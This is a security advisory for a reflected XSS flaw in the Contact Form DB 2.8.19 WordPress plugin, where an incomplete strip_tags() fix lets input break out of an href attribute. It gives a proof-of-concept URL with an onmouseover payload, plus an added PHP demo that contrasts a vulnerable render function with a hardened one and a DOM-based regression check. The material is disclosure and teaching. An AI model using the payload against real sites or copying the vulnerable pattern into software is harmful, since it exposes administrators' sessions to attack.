Contact Form DB 2.8.19 Reflected XSS

Homepage:

https://wordpress.org/plugins/contact-form-7-to-database-extension/

CVSS Score

2.1

CVSS Vector

(AV:N/AC:H/Au:S/C:P/I:N/A:N)

Description:

The previously reported XSS in this plugin (CVE-2014-7139) was not patched correctly; the fix relies on strip_tags(), which does not protect the attribute context shown below.

File: contact-form-7-to-database-extension\CFDBViewShortCodeBuilder.php

$postedForm = strip_tags(isset($_REQUEST['form']) ? $_REQUEST['form'] : '');
<a target="instructions" href="<?php echo $siteUrl ?>/wp-admin/admin-ajax.php?action=cfdb-export&enc=GLD&form=<?php echo $postedForm ?>"><?php _e('See instructions.'); ?></a>

Reflected XSS is still possible even though strip_tags() (and addslashes()) is applied. strip_tags() only removes <...> tag sequences and leaves double quotes untouched, so a value that closes the href attribute and appends an event-handler attribute reaches the page unchanged; addslashes() merely prepends a backslash, which has no meaning in HTML, so the quote still terminates the attribute.

Proof of Concept:

The payload executes in the browser of a logged-in administrator who opens the Short Code Builder page (hence Au:S in the vector).

http://wordpress-url/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&form=" onmouseover=alert(String.fromCharCode(88,83,83)) x="
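The following script is an added example, not code from the plugin or from the advisory author. It reproduces the vulnerable pattern quoted above with the PoC payload, shows that strip_tags() passes the payload through and lets it become a new attribute, and places a hardened rendering beside it. The $siteUrl value is an assumed stand-in; in a real WordPress plugin the idiomatic calls would be esc_url() and esc_attr(), here htmlspecialchars() and urlencode() are used so the script runs under plain php-cli.

```php
<?php
// Added example (not the plugin's code). Run with: php demo.php
// Payload is the one from the PoC above; $siteUrl is an assumed stand-in.
$payload = '" onmouseover=alert(String.fromCharCode(88,83,83)) x="';
$siteUrl = 'http://wordpress-url';

// Vulnerable pattern, mirroring the advisory: strip_tags() removes only
// <...> sequences. The payload contains no tag, so it survives intact and
// its leading double quote terminates the href attribute.
function render_vulnerable(string $siteUrl, string $form): string
{
    $postedForm = strip_tags($form);
    return '<a target="instructions" href="' . $siteUrl
        . '/wp-admin/admin-ajax.php?action=cfdb-export&enc=GLD&form=' . $postedForm
        . '">See instructions.</a>';
}

// Hardened pattern: encode for the context the value lands in.
// urlencode() keeps the value a single query parameter (quotes and spaces
// become %22 and +), and htmlspecialchars() with ENT_QUOTES encodes both
// quote characters and the ampersands for the attribute context.
function render_hardened(string $siteUrl, string $form): string
{
    $url = $siteUrl . '/wp-admin/admin-ajax.php?action=cfdb-export&enc=GLD&form='
        . urlencode($form);
    return '<a target="instructions" href="'
        . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '">See instructions.</a>';
}

// Simple check a reviewer can apply: did an attribute named on* appear
// that was not in the template? Uses the DOM parser rather than a regex.
function has_event_handler_attribute(string $html): bool
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);
    $doc->loadHTML($html);
    libxml_clear_errors();
    foreach ($doc->getElementsByTagName('a') as $anchor) {
        foreach ($anchor->attributes as $attr) {
            if (stripos($attr->name, 'on') === 0) {
                return true;
            }
        }
    }
    return false;
}

$vuln = render_vulnerable($siteUrl, $payload);
$safe = render_hardened($siteUrl, $payload);

echo "vulnerable:\n", $vuln, "\n";
echo "event handler injected: ", var_export(has_event_handler_attribute($vuln), true), "\n\n";
echo "hardened:\n", $safe, "\n";
echo "event handler injected: ", var_export(has_event_handler_attribute($safe), true), "\n";
```

In the vulnerable output the parser sees three attributes on the anchor (target, href and onmouseover); in the hardened output the whole payload stays inside the href value. The same DOM-based check is a reasonable regression test to keep alongside any fix, since it catches attribute breakouts that a tag-stripping filter is blind to.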

Timeline: